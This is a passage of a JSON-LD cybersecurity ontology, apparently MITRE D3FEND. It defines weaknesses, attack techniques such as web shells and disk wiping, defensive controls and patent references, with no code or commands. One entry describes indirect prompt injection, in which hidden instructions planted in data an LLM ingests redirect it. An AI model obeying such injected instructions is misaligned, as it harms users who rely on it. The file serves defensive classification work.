      "d3f:cwe-id": "CWE-527",
      "d3f:definition": "The product stores a CVS, git, or other repository in a directory, archive, or other resource that is stored, transferred, or otherwise made accessible to unauthorized actors.",
      "rdfs:label": "Exposure of Version-Control Repository to an Unauthorized Control Sphere",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-552"
      }
    },
    {
      "@id": "d3f:employed-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x employed-by y: An entity x is put into service by a technique or agent y. Inverse of y employs x.",
      "owl:inverseOf": {
        "@id": "d3f:employs"
      },
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01161188-v"
      },
      "rdfs:label": "employed-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-1271",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1271",
      "d3f:definition": "Security-critical logic is not set to a known value on reset.",
      "rdfs:label": "Uninitialized Value on Reset for Registers Holding Security Settings",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-909"
      }
    },
    {
      "@id": "d3f:Certificate",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:Identifier"
        },
        {
          "@id": "d3f:PublicKey"
        }
      ],
      "d3f:definition": "In cryptography, a public key certificate, also known as a digital certificate or identity certificate, is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner (called the subject), and the digital signature of an entity that has verified the certificate's contents (called the issuer). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject. In email encryption, code signing, and e-signature systems, a certificate's subject is typically a person or organization. However, in Transport Layer Security (TLS) a certificate's subject is typically a computer or other device.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Public_key_certificate"
      },
      "rdfs:label": "Certificate",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/certificate"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N8f22f7ac15de4595a25c7ae8cbf83ace"
        },
        {
          "@id": "_:Ncbad5cf91dd0402eb548227fe6156f24"
        }
      ],
      "skos:altLabel": "Public Key Certificate"
    },
    {
      "@id": "_:N8f22f7ac15de4595a25c7ae8cbf83ace",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Identifier"
      }
    },
    {
      "@id": "_:Ncbad5cf91dd0402eb548227fe6156f24",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PublicKey"
      }
    },
    {
      "@id": "d3f:CWE-537",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-537",
      "d3f:definition": "In many cases, an attacker can leverage the conditions that cause unhandled exception errors in order to gain unauthorized access to the system.",
      "rdfs:label": "Java Runtime Error Message Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-211"
      }
    },
    {
      "@id": "d3f:CWE-756",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-756",
      "d3f:definition": "The product does not return custom error pages to the user, possibly exposing sensitive information.",
      "rdfs:label": "Missing Custom Error Page",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-755"
      }
    },
    {
      "@id": "d3f:CWE-914",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-914",
      "d3f:definition": "The product does not properly restrict reading from or writing to dynamically-identified variables.",
      "rdfs:label": "Improper Control of Dynamically-Identified Variables",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-913"
        },
        {
          "@id": "d3f:CWE-99"
        }
      ]
    },
    {
      "@id": "d3f:UserAccountPermissions",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:UserAccountPermissions"
      ],
      "d3f:d3fend-id": "D3-UAP",
      "d3f:definition": "Restricting a user account's access to resources.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-ConfigureUserAccessControlAndPermissions"
      },
      "d3f:restricts": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "User Account Permissions",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessPolicyAdministration"
        },
        {
          "@id": "_:Neb4e2906ad9f425c847031723a5679e4"
        }
      ]
    },
    {
      "@id": "_:Neb4e2906ad9f425c847031723a5679e4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:T1601.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1601.001",
      "d3f:definition": "Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file.  Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.",
      "rdfs:label": "Patch System Image",
      "rdfs:subClassOf": {
        "@id": "d3f:T1601"
      }
    },
    {
      "@id": "d3f:macOSProcess",
      "@type": [
        "owl:NamedIndividual",
        "d3f:Process"
      ],
      "rdfs:label": "macOS Process"
    },
    {
      "@id": "d3f:Reference-PrivateVirtualLocalAreaNetworkIsolation_CiscoTechnologyInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20120331142A1"
      },
      "d3f:kb-abstract": "In one embodiment, a method includes obtaining addresses of end hosts at a switch, the switch configured with a primary virtual local area network and a secondary virtual local area network, creating a private virtual local area network access list comprising the addresses of end hosts permitted to communicate on the secondary virtual local area network, and applying the private virtual local area network access list to interfaces connected to the end hosts permitted to communicate on the secondary virtual local area network. An apparatus is also disclosed.",
      "d3f:kb-author": "Anuraag Mittal, Huei-Ping Chen",
      "d3f:kb-organization": "Cisco Technology Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:BroadcastDomainIsolation"
      },
      "d3f:kb-reference-title": "Private virtual local area network isolation",
      "rdfs:label": "Reference - Private virtual local area network isolation - Cisco Technology Inc"
    },
    {
      "@id": "d3f:T1180",
      "@type": "owl:Class",
      "d3f:attack-id": "T1180",
      "d3f:definition": "Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in <code>C:\\Windows\\System32\\</code>, and <code>C:\\Windows\\sysWOW64\\</code> on 64-bit Windows systems, along with screensavers included with base Windows installations.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.002",
      "rdfs:label": "Screensaver",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:has-recipient",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-recipient y: An agent y is the intended recipient and decoder of the information contained in communication x.",
      "rdfs:isDefinedBy": {
        "@id": "http://www.ontologyrepository.com/CommonCoreOntologies/has_recipient"
      },
      "rdfs:label": "has-recipient",
      "rdfs:seeAlso": [
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/09651094-n"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/09788768-n"
        }
      ],
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:PhysicalLink",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:carries": {
        "@id": "d3f:Signal"
      },
      "d3f:definition": "A physical link is a dedicated connection for communication that uses some physical media (electrical, electromagnetic, optical, to include clear spaces or vacuums.)  A physical link represents only a single hop (link) in any larger communcations path, circuit, or network.\n\nNOTE: not synonymous with data link as a data link can be over a telecommunications circuit, which may be a virtual circuit composed of multiple phyical links.",
      "d3f:synonym": "Layer-1 Link",
      "rdfs:label": "Physical Link",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/resource/Physical_layer"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Link"
        },
        {
          "@id": "_:N788d3c0ed4564542865d839ea84425a4"
        }
      ]
    },
    {
      "@id": "_:N788d3c0ed4564542865d839ea84425a4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:carries"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Signal"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_12",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Data Type Identifiers",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(12)"
    },
    {
      "@id": "d3f:Reference-UseOfAnApplicationControllerToMonitorAndControlSoftwareFileAndApplicationEnvironments_SophosLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20180032727A1"
      },
      "d3f:kb-abstract": "In embodiments of the present invention, a framework for an extensible, file-based security system is described for determining an appropriate application, application environment, and/or access or security control measure based at least in part on a file's reputation. In response to the selection of a file, an application controller may be used to select a software application from two or more software applications to open the selected file, based at least in part on the selected file's reputation. If launched, a software application may be configured to open the file in an environment, such as a virtual machine, quarantined environment, and the like, that is appropriate for the file based at least in part on the reputation information. A software application may be a secure software application configured to manage secure files, or an insecure software application configured to manage insecure files. The selected file, and communications relating to the selected software application, may be managed according to the selected software application's secure or insecure configuration. Further, the selected software application may associate reputation information with all files that are modified and/or created by the selected software application, including at least in part, reputation information matching that of the selected file.",
      "d3f:kb-author": "Andrew J. Thomas",
      "d3f:kb-mitre-analysis": "This patent describes received files being open in an environment such as a virtual machine or quarantined environment to associate file reputation information that determines if a file is a threat.",
      "d3f:kb-organization": "Sophos Ltd",
      "d3f:kb-reference-of": {
        "@id": "d3f:DynamicAnalysis"
      },
      "d3f:kb-reference-title": "Use of an application controller to monitor and control software file and application environments",
      "rdfs:label": "Reference - Use of an application controller to monitor and control software file and application environments - Sophos Ltd"
    },
    {
      "@id": "d3f:SystemConfigurationInitDatabaseRecord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A database record holding information used to configure the services, parameters, and initial settings for an operating system at startup.",
      "rdfs:label": "System Configuration Init Database Record",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemConfigurationDatabaseRecord"
        },
        {
          "@id": "d3f:SystemConfigurationInitResource"
        },
        {
          "@id": "d3f:SystemInitConfiguration"
        }
      ],
      "skos:altLabel": "System Configuration Startup Database Record"
    },
    {
      "@id": "d3f:attack-kb-data-property",
      "@type": "owl:DatatypeProperty",
      "rdfs:label": "attack-kb-data-property",
      "skos:altLabel": "attack-kb-property"
    },
    {
      "@id": "d3f:WindowsRegistryKey",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Windows Registry Keys are container objects similar to folders that contain subkeys and/or data entries called values. A key can be a 'Registry Hive' when it is root key of a logical group of keys, subkeys, and values that has a set of supporting files loaded into memory when the operating system is started or a user logs in.",
      "d3f:may-contain": [
        {
          "@id": "d3f:WindowsRegistryKey"
        },
        {
          "@id": "d3f:WindowsRegistryValue"
        }
      ],
      "rdfs:isDefinedBy": [
        {
          "@id": "http://dbpedia.org/resource/Windows_Registry#Keys_and_values"
        },
        {
          "@id": "https://learn.microsoft.com/en-us/windows/win32/sysinfo/structure-of-the-registry"
        }
      ],
      "rdfs:label": "Windows Registry Key",
      "rdfs:seeAlso": [
        {
          "@id": "https://learn.microsoft.com/en-us/windows/win32/sysinfo/registry-hives"
        },
        {
          "@id": "https://schema.ocsf.io/objects/registry_key"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemConfigurationDatabaseRecord"
        },
        {
          "@id": "_:N725eab2abc8a4d7a9a2813dc50ab28ad"
        },
        {
          "@id": "_:N44f17afe987b42c4bc3ad8acc1ce90ca"
        },
        {
          "@id": "_:Na1415071d5a64f8099b4a29ddf2e9fec"
        }
      ]
    },
    {
      "@id": "_:N725eab2abc8a4d7a9a2813dc50ab28ad",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKey"
      }
    },
    {
      "@id": "_:N44f17afe987b42c4bc3ad8acc1ce90ca",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryValue"
      }
    },
    {
      "@id": "_:Na1415071d5a64f8099b4a29ddf2e9fec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:windows-registry-key"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:string"
      }
    },
    {
      "@id": "d3f:T0853",
      "@type": "owl:Class",
      "d3f:attack-id": "T0853",
      "d3f:definition": "Adversaries may use scripting languages to execute arbitrary code in the form of a pre-written script or in the form of user-supplied code to an interpreter. Scripting languages are programming languages that differ from compiled languages, in that scripting languages use an interpreter, instead of a compiler. These interpreters read and compile part of the source code just before it is executed, as opposed to compilers, which compile each and every line of code to an executable file. Scripting allows software developers to run their code on any system where the interpreter exists. This way, they can distribute one package, instead of precompiling executables for many different systems. Scripting languages, such as Python, have their interpreters shipped as a default with many Linux distributions.",
      "rdfs:label": "Scripting - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSExecutionTechnique"
      },
      "skos:prefLabel": "Scripting"
    },
    {
      "@id": "d3f:T1015",
      "@type": "owl:Class",
      "d3f:attack-id": "T1015",
      "d3f:definition": "Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.008",
      "rdfs:label": "Accessibility Features",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.008"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-778",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-778",
      "d3f:definition": "When a security-critical event occurs, the product either does not record the event or omits important details about the event when logging it.",
      "rdfs:label": "Insufficient Logging",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-223"
        },
        {
          "@id": "d3f:CWE-693"
        }
      ]
    },
    {
      "@id": "d3f:LinuxELFFile32bit",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExecutableBinary"
      ],
      "d3f:definition": "test",
      "rdfs:label": "Linux ELF File 32bit"
    },
    {
      "@id": "d3f:CCI-002712_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:FileHashing"
        },
        {
          "@id": "d3f:PointerAuthentication"
        },
        {
          "@id": "d3f:TPMBootIntegrity"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system performs an integrity check of organization-defined information at startup, at organization-defined transitional states or security-relevant events, or on an organization-defined frequency.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002712"
    },
    {
      "@id": "d3f:OperatingSystemLogFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An operating system log file records events that occur in an operating system.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Log_file"
      },
      "rdfs:label": "Operating System Log File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LogFile"
        },
        {
          "@id": "d3f:OperatingSystemFile"
        }
      ]
    },
    {
      "@id": "d3f:T0849",
      "@type": "owl:Class",
      "d3f:attack-id": "T0849",
      "d3f:definition": "Adversaries may use masquerading to disguise a malicious application or executable as another file, to avoid operator and engineer suspicion. Possible disguises of these masquerading files can include commonly found programs, expected vendor executables and configuration files, and other commonplace application and naming conventions. By impersonating expected and vendor-relevant files and applications, operators and engineers may not notice the presence of the underlying malicious content and possibly end up running those masquerading as legitimate functions.",
      "rdfs:label": "Masquerading - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSEvasionTechnique"
      },
      "skos:prefLabel": "Masquerading"
    },
    {
      "@id": "d3f:ATTACKMobileTactic",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK Mobile Tactic",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileThing"
      }
    },
    {
      "@id": "d3f:T1071.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1071.005",
      "d3f:definition": "Adversaries may communicate using publish/subscribe (pub/sub) application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.",
      "rdfs:label": "Publish/Subscribe Protocols",
      "rdfs:subClassOf": {
        "@id": "d3f:T1071"
      }
    },
    {
      "@id": "d3f:T1561",
      "@type": "owl:Class",
      "d3f:attack-id": "T1561",
      "d3f:definition": "Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.",
      "rdfs:label": "Disk Wipe",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:RemoteLoginSession",
      "@type": "owl:Class",
      "d3f:definition": "A remote login session is a login session where a client has logged in from their local host machine to a server via a network.",
      "rdfs:label": "Remote Login Session",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkSession"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SI-4_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "System Monitoring | Inbound and Outbound Communications Traffic",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:NetworkTrafficAnalysis"
      },
      "rdfs:label": "SI-4(4)"
    },
    {
      "@id": "d3f:CCI-001662_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system takes organization-defined corrective action when organization-defined unacceptable mobile code is identified.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DynamicAnalysis"
        },
        {
          "@id": "d3f:EmulatedFileAnalysis"
        },
        {
          "@id": "d3f:FileContentRules"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2010-05-12T00:00:00"
      },
      "rdfs:label": "CCI-001662"
    },
    {
      "@id": "d3f:High-dimensionClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-HDC",
      "d3f:definition": "The cluster analysis of data with anywhere from a few dozen to many thousands of dimensions.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Clustering high-dimensional data. [Link](https://en.wikipedia.org/wiki/Clustering_high-dimensional_data)",
      "rdfs:label": "High-dimension Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:ClusterAnalysis"
      }
    },
    {
      "@id": "d3f:Actor-Critic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-AC",
      "d3f:definition": "Actor-Critic is a Temporal Difference(TD) version of Policy gradient. It has two networks: Actor and Critic. The actor decided which action should be taken and critic inform the actor how good was the action and how it should adjust. The learning of the actor is based on policy gradient approach. In comparison, critics evaluate the action produced by the actor by computing the value function.",
      "d3f:kb-article": "## References\nThe Actor-Critic Reinforcement Learning Algorithm. Medium. [Link](https://medium.com/intro-to-artificial-intelligence/the-actor-critic-reinforcement-learning-algorithm-c8095a655c14).",
      "rdfs:label": "Actor-Critic",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PolicyGradient"
        },
        {
          "@id": "d3f:TemporalDifferenceLearning"
        }
      ]
    },
    {
      "@id": "d3f:Reference-ConfigureUserAccessControlAndPermissions",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/windows-server/manage/windows-admin-center/configure/user-access-control"
      },
      "d3f:kb-abstract": "When deployed on Windows Server, Windows Admin Center provides a centralized point of management for your server environment. By controlling access to Windows Admin Center, you can improve the security of your management landscape.",
      "d3f:kb-author": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:kb-reference-title": "Configure User Access Control and Permissions",
      "rdfs:label": "Reference - Configure User Access Control and Permissions"
    },
    {
      "@id": "d3f:NetworkFileShareResource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A shared file resource, or network file share, is a computer file made available from one host to other hosts on a computer network. Network sharing is made possible by inter-process communication over the network. It includes both files and directories.",
      "rdfs:label": "Network File Share Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkResource"
      }
    },
    {
      "@id": "d3f:T1589.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1589.001",
      "d3f:definition": "Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.",
      "rdfs:label": "Credentials",
      "rdfs:subClassOf": {
        "@id": "d3f:T1589"
      }
    },
    {
      "@id": "d3f:EventLogDeleteEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the event log database, file, or cache is deleted from the system, removing the log's historical records.",
      "rdfs:label": "Event Log Delete Event",
      "rdfs:subClassOf": {
        "@id": "d3f:EventLogEvent"
      }
    },
    {
      "@id": "d3f:T0863",
      "@type": "owl:Class",
      "d3f:attack-id": "T0863",
      "d3f:definition": "Adversaries may rely on a targeted organizations user interaction for the execution of malicious code. User interaction may consist of installing applications, opening email attachments, or granting higher permissions to documents.",
      "rdfs:label": "User Execution - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSExecutionTechnique"
      },
      "skos:prefLabel": "User Execution"
    },
    {
      "@id": "d3f:T1505.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:WebScriptFile"
      },
      "d3f:attack-id": "T1505.003",
      "d3f:definition": "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW)",
      "d3f:modifies": {
        "@id": "d3f:WebServer"
      },
      "d3f:produces": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Web Shell",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1505"
        },
        {
          "@id": "_:N0f640bd07dfe45aea28a2e61027beac7"
        },
        {
          "@id": "_:Naddace56ac564207a3132a46b6f5d80b"
        },
        {
          "@id": "_:Nbf9cf33f67a646adb9dead079240f411"
        }
      ]
    },
    {
      "@id": "_:N0f640bd07dfe45aea28a2e61027beac7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WebScriptFile"
      }
    },
    {
      "@id": "_:Naddace56ac564207a3132a46b6f5d80b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WebServer"
      }
    },
    {
      "@id": "_:Nbf9cf33f67a646adb9dead079240f411",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:NetworkConnectionOpenEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a network connection is successfully opened.",
      "rdfs:label": "Network Connection Open Event",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkConnectionEvent"
      }
    },
    {
      "@id": "d3f:ATLASInitialAccessTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0004"
      },
      "rdfs:label": "Initial Access Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:Nb38914e39d414bfc83adc19db88d0efa"
        }
      ],
      "skos:prefLabel": "Initial Access Technique"
    },
    {
      "@id": "_:Nb38914e39d414bfc83adc19db88d0efa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0004"
      }
    },
    {
      "@id": "d3f:AML.T0051.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0051.001",
      "d3f:definition": "An adversary may inject prompts indirectly via separate data channel ingested by the LLM such as include text or multimedia pulled from databases or websites.\nThese malicious prompts may be hidden or obfuscated from the user. This type of injection may be used by the adversary to gain a foothold in the system or to target an unwitting user of the system.",
      "rdfs:label": "Indirect - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0051.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0051"
      },
      "skos:prefLabel": "Indirect"
    },
    {
      "@id": "d3f:DiskEncryption",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DiskEncryption"
      ],
      "d3f:d3fend-id": "D3-DENCR",
      "d3f:definition": "Encrypting a hard disk partition to prevent cleartext access to a file system.",
      "d3f:encrypts": {
        "@id": "d3f:Storage"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-LUKS1On-DiskFormatSpecificationVersion1.2.3"
      },
      "rdfs:label": "Disk Encryption",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "_:N543b8b6e8cff4de6b16b58655a808a39"
        }
      ]
    },
    {
      "@id": "_:N543b8b6e8cff4de6b16b58655a808a39",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:encrypts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Storage"
      }
    },
    {
      "@id": "d3f:PasswordRotation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PasswordRotation"
      ],
      "d3f:d3fend-id": "D3-PR",
      "d3f:definition": "Password rotation is a security policy that mandates the periodic change of user account passwords to mitigate the risk of unauthorized access due to compromised credentials.",
      "d3f:kb-article": "## How it works\n\nUsers may be requested to change their passwords on a regular schedule. Management servers with enterprise policies for account management provide the ability to change or reset passwords for accounts.\n\n## Considerations\n\nRequiring users to change their passwords frequently can result in insecure password practices by the user. The latest update of NIST SP 800-63B, Digital Identity Guidelines, recommends requiring password reset only when a known compromise has occurred, or every 365 days, rather than every 60 or 90 days.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-PasswordandKeyRotation-SSH"
      },
      "d3f:regenerates": {
        "@id": "d3f:Password"
      },
      "rdfs:label": "Password Rotation",
      "rdfs:seeAlso": [
        {
          "@id": "https://pages.nist.gov/800-63-3/sp800-63-3.html"
        },
        {
          "@id": "https://www.auditboard.com/blog/nist-password-guidelines/"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialRotation"
        },
        {
          "@id": "_:Nead1ee5bf34147889954fb20fe168820"
        }
      ]
    },
    {
      "@id": "_:Nead1ee5bf34147889954fb20fe168820",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:regenerates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Password"
      }
    },
    {
      "@id": "d3f:T1677",
      "@type": "owl:Class",
      "d3f:attack-id": "T1677",
      "d3f:definition": "Adversaries may manipulate continuous integration / continuous development (CI/CD) processes by injecting malicious code into the build process. There are several mechanisms for poisoning pipelines:",
      "rdfs:label": "Poisoned Pipeline Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:T1564.006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1564.006",
      "d3f:creates": {
        "@id": "d3f:File"
      },
      "d3f:definition": "Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)",
      "d3f:executes": {
        "@id": "d3f:VirtualizationSoftware"
      },
      "d3f:may-add": {
